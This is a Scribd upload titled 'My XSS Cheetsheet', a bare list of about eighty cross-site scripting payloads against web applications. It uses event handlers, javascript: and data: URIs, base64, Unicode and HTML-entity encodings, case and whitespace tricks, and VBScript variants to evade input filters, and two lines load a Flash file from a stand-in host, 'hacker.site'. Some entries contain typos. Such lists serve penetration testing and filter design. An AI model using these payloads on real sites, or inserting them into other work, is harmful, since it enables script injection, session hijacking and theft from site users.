Scribd
Upload
49 views2 pages

My XSS Cheetsheet

Uploaded by

FARDEEN AHMED 18BCY10034
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
49 views2 pages

My XSS Cheetsheet

Uploaded by

FARDEEN AHMED 18BCY10034
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

<ScRiPt>alert(1);</ScRiPt>

<ScRiPt>aler(1);
<script/random>alert(1);</script>
<script
>alert(1);</script>
<scr<script>ipt>alert(1)</scr<script>ipt>
<scr\x00ipt>alert(1)</scr\x00ipt>
<a href="javascript:alert(1)">show</a>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">show</a>
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<object data="//hacker.site/xss.swf">
<embed code="//hacker.site/xss.swf" allowscriptaccess=always>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<input type=image src=x:x onerror=alert(1)>
<isindex on mouseover="alert(1)" >
<form oninput=alert(1)><input></form>
<textarea autofocus onfocus=alert(1)>
<input oncut=alert(1)>
<svg on load=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source on error="alert(1)">
<marquee onstart=alert(1)>
<svg/onload=alert(1)>
<svg//////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id= 'x' onload=alert(1)>
<svg onload%09=alert(1)>
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload%0B=alert(1)>
<script>\u0061lert(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>eval("\u0061lert(1)")</script>
<script>eval("\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029")</script>
<img src=x onerror>"\u0061lert(1)"/>
<img src=x onerror="eval('\141lert(1)')"/>
<img src=x onerror=:eval('\x61lert(1)')"/>
<img src=x onerror="&#x0061;lert(1)"/>
<img src=x onerror="&#97;lert(1)"/>
<img src=x onerror="eval('\a\1\ert\(1\)')"/>
<img src=x onerror="\u0065val('\141\u006c&#101;&#x0072t\(&#49)')"/>
<object data="JaVaScRiPt:alert(1)">
<objecct data="javascript&color;alert(!)">
<object data="java
script:alert(1)">
<object data="javascript&#x003A;alert(1)">
<object data="javascript&#58;alert(1)">
<object data="&#x6A;avascript:alert(1)">
<object
data="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64, PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed code="DaTa:text/html,<script>alert(1)</script>
<embed code="data&colon;text/html,<script>alert(1)</script>
<embed code="data&#x003A;text/html,<script>alert(1)</script>">
<embed code="&#x64;&#x61;ta:text/html,<script>alert(1)</script>">
<img src=a onerror="vbscript:msgbox 1"/>
<img src=b onerror="vbs:msgbox 2"/>
<img src=c onerror="vbs:alert(3)"/>
<img src=d onerror="vbscript:alert(4)"/>
<iMg src=a onErRor="vBsCriPt:AlErT(4)"/>
<img src=x onerror="vbscript&#x003A;alert(1)">
<img src=x onerror="vb&#x63;cript:alert(1)">
<img src=x onerror="v&#00;bs&#x00;cri pt:alert(1)">
<img src=x onerror="vbscript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">
<img src=x language="VBScript.Encode" onerror="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">
<script language="VBScript.Encode">#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@</script>
<scr<script>ipt>alert(1)</script>
<scr<iframe>ipt>alert(1)</script>
<img src=x onerror="windows.onerror=eval;throw'=alert\x281\x29'">
<img src=x
onerror="window.onerror=eval;throw'\u003d&#x0061;&#x006C;ert&#x0028;1&#41;'"/>

You might also like